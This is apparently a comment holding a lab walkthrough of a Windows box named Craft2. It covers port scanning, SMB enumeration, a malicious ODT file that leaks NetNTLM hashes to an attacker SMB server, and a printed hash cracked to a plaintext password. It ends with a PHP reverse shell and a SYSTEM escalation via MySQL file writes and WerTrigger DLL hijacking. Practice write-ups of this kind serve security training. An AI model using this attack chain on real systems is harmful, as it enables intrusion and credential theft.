WDavid404
commented
1 month ago PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 125 Apache httpd 2.4.48 ((Win64) OpenSSL/1.1.1k PHP/8.0.7)
|_http-title: Craft
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack ttl 125
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC80/tcp
click "Admin logon" --> javascript:alert
Upload file button:
upload a php file --> invalid file
http://192.168.156.188/upload.php
upload a php.odt file
-->
You're resume was submitted, it will be reviewed shortly by our staff. We are also aware of macro phishing attempts made previously
Search exploit about craft -->
- Craft CMS 4.4.14 - Unauthenticated Remote Code Execution
- https://gist.github.com/gmh5225/8fad5f02c2cf0334249614eb80cbf4ce -->didn't work
445/tcp (SMB):
-->
crackmapexec smb 192.168.156.188 --shares
smbclient --no-pass //192.168.156.188/CRAFT2/ --> Failed (session setup failed: NT_STATUS_ACCESS_DENIED)
since it upload ODT file --> search exploit info about ODT
-->
pip2.7 install ezodf
python2.7 44564.py
Got stuck...
find python3 version for generating a malicious odf file to leak NetNTLM Creds: https://github.com/rmdavy/badodf/blob/master/badodt.py
(Need "pip3 install ezodf" at first)
On kali, start a smbserver impacket-smbserver smb_wei . -smb2support
Upload bad.odt file on Craft2 webpage,
after a while, we get NTML info
thecybergeek::CRAFT2:aaaaaaaaaaaaaaaa:5f56d9e5a2e3c9ca22f29a30734bf3c4:010100000000000080fdef619ce4da01ddff63db32dd50d200000000010010004e0064006c0063005000410041004f00030010004e0064006c0063005000410041004f00020010007000660048004e0054004e0079007a00040010007000660048004e0054004e0079007a000700080080fdef619ce4da010600040002000000080030003000000000000000000000000030000086133d4ee0733a819b55e3a4c1cb1c1188f700332547ae4689846629f77fcbdf0a001000000000000000000000000000000000000900260063006900660073002f003100390032002e003100360038002e00340035002e003200300035000000000000000000
copy all string above to hash.txt and execute john command
(hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt also works)
--> winniethepooh
enum4linux -a -u "CRAFT2\\thecybergeek" -p "winniethepooh" 192.168.156.188
Go to share dir:
smbclient //192.168.156.188/WebApp -U 'CRAFT2\thecybergeek'
Found we can upload files here and access it via http://$IP/
then, access "http://192.168.156.188/php_windows_reverse_shell.php"
--> Got a reverse shell successfully.
PE
winpeas:
--> mysql server is runing and have write permission as root.
According to the resource:
- Clone https://github.com/sailay1996/WerTrigger
- Copy phoneinfo.dll to C:\Windows\System32\ ---> move those files to C:\windows\system32 using MySQL.
- Place Report.wer file and WerTrigger.exe in a same directory --> move those files to C:\windows\system32 using MySQL.
select load_file('C:\\xampp\\htdocs\\phoneinfo.dll') into dumpfile 'C:\\Windows\\system32\\phoneinfo.dll'; select load_file('C:\\xampp\\htdocs\\Report.wer') into dumpfile 'C:\\Windows\\system32\\Report.wer'; select load_file('C:\\xampp\\htdocs\\WerTrigger.exe') into dumpfile 'C:\\Windows\\system32\\WerTrigger.exe'; - Then, run WerTrigger.exe.
- Enjoy a shell as NT AUTHORITY\SYSTEM
Keypoints: